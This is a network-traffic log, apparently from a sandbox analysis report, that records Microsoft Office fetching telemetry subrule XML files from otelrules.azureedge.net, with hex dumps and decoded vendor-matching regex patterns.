                                                          2024-12-02 16:56:23 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          53192.168.2.44981013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:23 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:23 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:23 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 423
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                          ETag: "0x8DC582BB7564CE8"
                                                          x-ms-request-id: dc0e6055-901e-005b-2d91-3f2005000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165623Z-174f7845968n2hr8hC1EWR9cag00000014d0000000007ff7
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:23 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          54192.168.2.44981113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:23 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:24 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:23 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 478
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                          ETag: "0x8DC582B9B233827"
                                                          x-ms-request-id: ef6d0e99-401e-0067-3dc7-4309c2000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165623Z-174f7845968px8v7hC1EWR08ng000000151g000000003x0k
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:24 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          55192.168.2.44981213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:23 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:24 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:24 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 404
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                          ETag: "0x8DC582B95C61A3C"
                                                          x-ms-request-id: 13e6cbbb-001e-005a-04a3-43c3d0000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165624Z-174f7845968jrjrxhC1EWRmmrs00000014sg00000000r46h
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:24 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          56192.168.2.44981413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:25 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:26 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:25 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 400
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                          ETag: "0x8DC582BB2D62837"
                                                          x-ms-request-id: 241a7da4-a01e-00ab-50cc-439106000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165625Z-174f7845968glpgnhC1EWR7uec00000014u000000000p5hy
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:26 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          57192.168.2.44981513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:25 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:26 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:25 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 479
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                          ETag: "0x8DC582BB7D702D0"
                                                          x-ms-request-id: 8dfbf447-101e-0028-0f8e-3f8f64000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165625Z-174f7845968qj8jrhC1EWRh41s00000014hg00000000unb2
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:26 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          58192.168.2.44981313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:25 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:26 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:26 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 468
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                          ETag: "0x8DC582BB046B576"
                                                          x-ms-request-id: cdcb5222-c01e-0014-44bd-42a6a3000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165626Z-174f7845968j6t2phC1EWRcfe800000014rg00000000xuuc
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:26 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          59192.168.2.44981613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:25 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:26 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:26 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 425
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                          ETag: "0x8DC582BBA25094F"
                                                          x-ms-request-id: d2a0c1bd-101e-0017-761b-4147c7000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165626Z-174f7845968jrjrxhC1EWRmmrs00000014yg000000001hz8
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:26 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          60192.168.2.44981713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:26 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:26 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:26 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 475
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                          ETag: "0x8DC582BB2BE84FD"
                                                          x-ms-request-id: 20d43c3b-001e-0049-3b6b-435bd5000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165626Z-174f7845968zgtf6hC1EWRqd8s0000000xng00000000h0ms
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:26 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          61192.168.2.44981813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:27 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:28 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:28 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 448
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                          ETag: "0x8DC582BB389F49B"
                                                          x-ms-request-id: 07e13988-c01e-0049-0444-44ac27000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165628Z-174f7845968px8v7hC1EWR08ng00000014wg00000000sqst
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:28 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          62192.168.2.44981913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:27 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:28 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:28 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 491
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                          ETag: "0x8DC582B98B88612"
                                                          x-ms-request-id: 21da0aac-a01e-0021-7d18-43814c000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165628Z-174f78459684bddphC1EWRbht400000014dg00000000h0vs
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:28 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          63192.168.2.44982013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:28 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:28 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:28 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 416
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                          ETag: "0x8DC582BAEA4B445"
                                                          x-ms-request-id: 3fc8ca9f-401e-0083-6c91-3f075c000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165628Z-174f7845968jrjrxhC1EWRmmrs00000014w000000000aasm
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
